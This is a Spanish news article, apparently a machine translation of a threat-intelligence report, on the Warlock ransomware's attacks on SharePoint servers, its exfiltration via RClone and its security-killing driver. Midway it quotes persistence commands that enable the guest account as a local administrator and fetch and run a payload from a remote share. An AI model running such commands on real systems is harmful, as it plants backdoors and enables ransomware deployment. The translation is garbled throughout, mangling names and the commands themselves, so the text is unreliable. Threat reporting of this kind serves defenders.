En las últimas semanas, la comunidad de seguridad cibernética ha sido testigo de la rápida aparición de Warlock, una nueva cepa de ransomware que armaba los servidores de Microsoft SharePoint sin parpadeo para infiltrarse en redes empresariales.
El análisis inicial revela que los actores de amenaza explotan instancias de SharePoint expuestas públicamente a través de solicitudes de publicación HTTP especialmente elaboradas, implementando capas web que otorgan ejecución de código remoto dentro del entorno de destino.
A partir de este punto de apoyo, los operadores de brujo intensifican los privilegios, las credenciales de cosecha y se mueven lateralmente utilizando utilidades de Windows incorporadas y componentes de malware personalizados.
La carga útil finalmente cifra los datos críticos y exfiltra archivos confidenciales, exigiendo el rescate bajo la extensión “.x2anylock”.
Tendencia a los micro analistas anotado Ese brujo apareció por primera vez en foros subterráneos en junio de 2025, poco después de que se revelaron vulnerabilidades en la autenticación de SharePoint y los mecanismos de deserialización.
En cuestión de días, el grupo reclamó múltiples víctimas de alto perfil en los sectores gubernamentales, financieros y de fabricación en todo el mundo.
Los investigadores identificaron patrones de código que recuerdan al constructor Lockbit 3.0 filtrado, lo que sugiere que el brujo puede ser un derivado personalizado en lugar de una creación totalmente original.
Esta afiliación está respaldada por similitudes en las tácticas de negociación y el formato de notas de rescate.
El impacto del brujo se extiende más allá del cifrado. Durante la etapa final de un ataque, los operadores emplean la herramienta de sincronización legítima RClone, reservada como TendendSecurity.exe, para desviar las credenciales, los documentos y los archivos de base de datos al almacenamiento externo en la nube. Esta fase de exfiltración utiliza un back -end de protón, aprovechando las credenciales de quemadores para oscurecer el destino.
Además, el Ransomware deshabilita o termina los servicios de protección del punto final mediante la implementación de un controlador malicioso (Googleapiutil64.sys) para matar procesos de seguridad, incluidos los propios netagent y voneagentconsoletray de Trend Micro.
Activando la cuenta ‘invitada’ (Fuente – Trend Micro)
Tales acciones destacan la sofisticación de las tácticas de evasión de defensa de Warlock. Un subtema crítico que ejemplifica el enfoque sigiloso de Warlock es su mecanismo de persistencia.
Después de cargar con éxito un shell web, los atacantes implementan un script por lotes llamado TakeOver.bat, que automatiza la creación de una cuenta de puerta trasera y la instalación de tareas programadas.
El script comienza activando la cuenta “invitada” incorporada y agregándola al grupo de administradores locales:-
¡Net usuario invitado p@ssw0rd! /Activo: sí, administradores de grupos locales net, invitado /agregado
A continuación, copia la carga útil maliciosa y las herramientas auxiliares de una acción remota a c: \ users \ public \, usando:-
cmd (.) exe /c copia \\ 10.0.0.5 \ herramientas \* c: \ users \ public \ /y start /bc:\users\public\payload.exe
Esto asegura que la carga útil sobrevive a los reiniciados del sistema y continúe ejecutándose bajo un escrutinio mínimo.
Los investigadores identificaron que el script también crea un nuevo objeto de política grupal llamado “adquisición” para restablecer la cuenta de puerta trasera si se realizan intentos de remediación.
La ejecución del archivo por lotes eventualmente conduce a la implementación de ransomware (fuente – Trend Micro)
Al combinar la explotación de shell web, el abuso de políticas grupales y la terminación del proceso basada en el conductor, Warlock logra una presencia resistente dentro de las redes comprometidas.
Su diseño modular y uso de servicios públicos legítimos complican aún más los esfuerzos de detección y respuesta.
A medida que las organizaciones continúan parchando las vulnerabilidades de SharePoint, los defensores también deben monitorear las modificaciones anómalas de GPO, las instalaciones de servicios inusuales y los binarios renombrados dentro de las carpetas públicas para detectar y mitigar entornos infectados por el brujo.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
